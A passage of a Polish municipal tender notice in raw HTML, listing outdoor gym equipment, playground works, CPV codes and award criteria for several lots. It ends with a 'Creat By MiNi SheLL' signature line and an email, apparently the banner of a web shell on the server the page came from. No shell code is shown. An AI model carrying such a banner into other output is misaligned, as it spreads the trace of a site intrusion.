2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	prasa nożna podwójna - 1 szt.
5.	orbitrek podwójny - 1 szt.
6.	wioślarz podwójny - 1 szt.
7.	rower podwójny - 1 szt.
8.	jeździec podwójny - 1 szt.
9.	surfer podwójny - 1 szt.
10.	twister podwójny - 1 szt.
11.	stepper podwójny - 1 szt. 
12.	ławka podwójna - 1 szt.
13.	małe koła TAI CHI - 1 szt.
14.	duże koła TAI CHI - 1 szt.
15.	masażer podwójny - 1 szt.
16.	poręcze - 1 szt.
17.	drążek do podciągania podwójny - 1 szt.
18.	DLA ON - sztanga z obciążeniem do wypychania i surfer z obciążeniem do ćwiczenia rąk   - 1 szt.
19.	ławka z oparciem - 3 szt.     
20.	kosz na śmieci - 3 szt.  
21.	tablica z regulaminem - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi za wady (min. 36 miesięcy max. 60 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Budowa siłowni plenerowej przy ul. Obywatelskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż następujących urządzeń:
1.	krzesło do wyciskania podwójne - 1 szt.
2.	orbitrek podwójny - 1 szt.
3.	wioślarz podwójny - 1 szt.
4.	ławka podwójna - 1 szt.
5.	drążek do podciągania podwójny - 1 szt.
6.	ławka z oparciem - 2 szt.   
7.	kosz na śmieci - 2 szt.  
- budowa placu zabaw, wyposażonego w następujące urządzenia: 
1.	Zestaw zabawowy 
2.	Huśtawka pojedyncza (siedzisko koszyczkowe)
3.	Huśtawka podwójna opony 
4.	Huśtawka ważka 
- wykonanie nawierzchni piaskowej w strefach bezpieczeństwa urządzeń
- wykonanie dojścia o nawierzchni z płyt ażurowych na podbudowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi za wady (min. 36 miesięcy max. 60 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Budowa siłowni plenerowej na placu zabaw przy ul. Cmentarnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż następujących urządzeń:
1.	krzesło do wyciskania podwójne - 1 szt.
2.	orbitrek podwójny - 1 szt.
3.	wioślarz podwójny - 1 szt. 
4.	rower podwójny - 1 szt.
- wykonanie nawierzchni poliuretanowej wraz z podbudową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi za wady (min. 36 miesięcy max. 60 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Budowa siłowni plenerowej przy ul. Przejazdowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 2 szt.
2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	orbitrek podwójny - 1 szt.
5.	wioślarz podwójny - 1 szt.
6.	rower podwójny - 1 szt.
7.	surfer podwójny - 1 szt.
8.	ławka podwójna - 1 szt.
9.	ławka z oparciem - 1 szt.     
10.	kosz na śmieci - 1 szt.  
- wykonanie nawierzchni poliuretanowej wraz z podbudową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi za wady (min. 36 miesięcy max. 60 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Budowa siłowni plenerowej przy II LO przy ul. Norwida.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 1 szt.
2.	wyciąg górny podwójny - 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	prasa nożna podwójna - 1 szt.
5.	orbitrek podwójny - 1 szt.
6.	wioślarz podwójny - 1 szt.
7.	rower podwójny - 1 szt.
8.	jeździec podwójny - 1 szt.
9.	surfer podwójny - 1 szt.
10.	twister podwójny - 1 szt.
11.	ławka podwójna - 1 szt.
12.	masażer podwójny - 1 szt.
13.	drążek do podciągania podwójny - 1 szt.
14.	ławka z oparciem - 3 szt.     
15.	kosz na śmieci - 3  szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi za wady (min. 36 miesięcy max. 60 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Budowa siłowni plenerowej przy ul. Wojska Polskiego w sąsiedztwie Przedszkola nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż następujących urządzeń:
1.	biegacz podwójny - 1 szt.
2.	wyciąg górny podwójny- 1 szt.
3.	krzesło do wyciskania podwójne - 1 szt.
4.	narciarz podwójny - 1 szt.
5.	orbitrek podwójny - 1 szt.
6.	motyl pojedynczy - 1 szt.
7.	rower podwójny - 1 szt.
8.	ławka podwójna - 1 szt.
9.	ławka z oparciem - 2 szt.   
10.	kosz na śmieci - 2  szt.  
- wykonanie nawierzchni poliuretanowej wraz z podbudową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi za wady (min. 36 miesięcy max. 60 miesięcy) - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com